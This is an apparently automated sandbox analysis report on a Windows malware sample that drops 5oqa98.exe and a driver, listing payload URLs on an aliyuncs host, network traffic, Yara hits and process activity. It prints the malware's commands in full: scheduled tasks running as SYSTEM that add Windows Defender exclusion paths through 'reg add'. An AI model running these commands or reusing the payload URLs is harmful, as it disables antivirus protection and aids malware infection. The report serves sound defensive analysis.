Source: 5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000141000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000146000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
Source: 5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000141000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000146000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2572103669.0000000000570000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg-
Source: 5oqa98.exe, 00000008.00000002.2572103669.0000000000570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgHQx8
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgK
Source: 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgr:
Source: 5oqa98.exe, 00000008.00000002.2571919128.0000000000138000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2572341203.000000000062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.data
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-1003
Source: 5oqa98.exe, 00000008.00000002.2572341203.000000000062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/q
Source: 5oqa98.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: 5oqa98.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: 5oqa98.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: 5oqa98.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownHTTPS traffic detected: 39.103.20.26:443 -> 192.168.2.9:49974 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49981 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.5oqa98.exe.2890000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 8.2.5oqa98.exe.28f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140006C95 NtAllocateVirtualMemory,7_2_0000000140006C95
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_000000014000C3F07_2_000000014000C3F0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_000000014000CC007_2_000000014000CC00
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140001A307_2_0000000140001A30
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_000000014000C2A07_2_000000014000C2A0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00000001400022C07_2_00000001400022C0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00000001400110F07_2_00000001400110F0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140010CF07_2_0000000140010CF0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00000001400093007_2_0000000140009300
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_000000014000BB707_2_000000014000BB70
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140003F807_2_0000000140003F80
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00000001400103D07_2_00000001400103D0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00007FF8FF5E02487_2_00007FF8FF5E0248
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00007FF8FF5DA1B87_2_00007FF8FF5DA1B8
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028F3CA08_2_028F3CA0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028F92808_2_028F9280
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028F82C08_2_028F82C0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028FC23C8_2_028FC23C
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_029010FC8_2_029010FC
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_02A0F8288_2_02A0F828
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_0292C9988_2_0292C998
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028F86C88_2_028F86C8
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028FC6D08_2_028FC6D0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028F84C48_2_028F84C4
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_02900C608_2_02900C60
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028F8D788_2_028F8D78
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_0062D5358_2_0062D535
Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\5oqa98.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: 2749837485743-7684385786.05.exe, 00000000.00000000.1328965919.0000000141D79000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWatersPrintCaptureProxy.EXEJ vs 2749837485743-7684385786.05.exe
Source: 2749837485743-7684385786.05.exeBinary or memory string: OriginalFilenameWatersPrintCaptureProxy.EXEJ vs 2749837485743-7684385786.05.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: 7.2.5oqa98.exe.2890000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 8.2.5oqa98.exe.28f0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 189atohci.sys.0.drBinary string: \Device\Driver\
Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
Source: classification engineClassification label: mal92.evad.winEXE@55/18@2/2
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,7_2_0000000140003F80
Source: C:\Users\user\Documents\5oqa98.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,7_2_0000000140001430
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_028F18A0 CreateToolhelp32Snapshot,Process32First,Process32Next,SleepEx,CreateToolhelp32Snapshot,8_2_028F18A0
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,7_2_0000000140001520
Source: C:\Users\user\Documents\5oqa98.exeFile created: C:\Program Files (x86)\naBa3AJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\i[1].datJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6068:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3896:120:WilError_03
Source: C:\Users\user\Documents\5oqa98.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
Source: 2749837485743-7684385786.05.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\5oqa98.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile read: C:\Users\user\Desktop\2749837485743-7684385786.05.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\2749837485743-7684385786.05.exe "C:\Users\user\Desktop\2749837485743-7684385786.05.exe"
Source: unknownProcess created: C:\Users\user\Documents\5oqa98.exe C:\Users\user\Documents\5oqa98.exe
Source: unknownProcess created: C:\Users\user\Documents\5oqa98.exe C:\Users\user\Documents\5oqa98.exe
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeSection loaded: cryptsp.dllJump to behavior
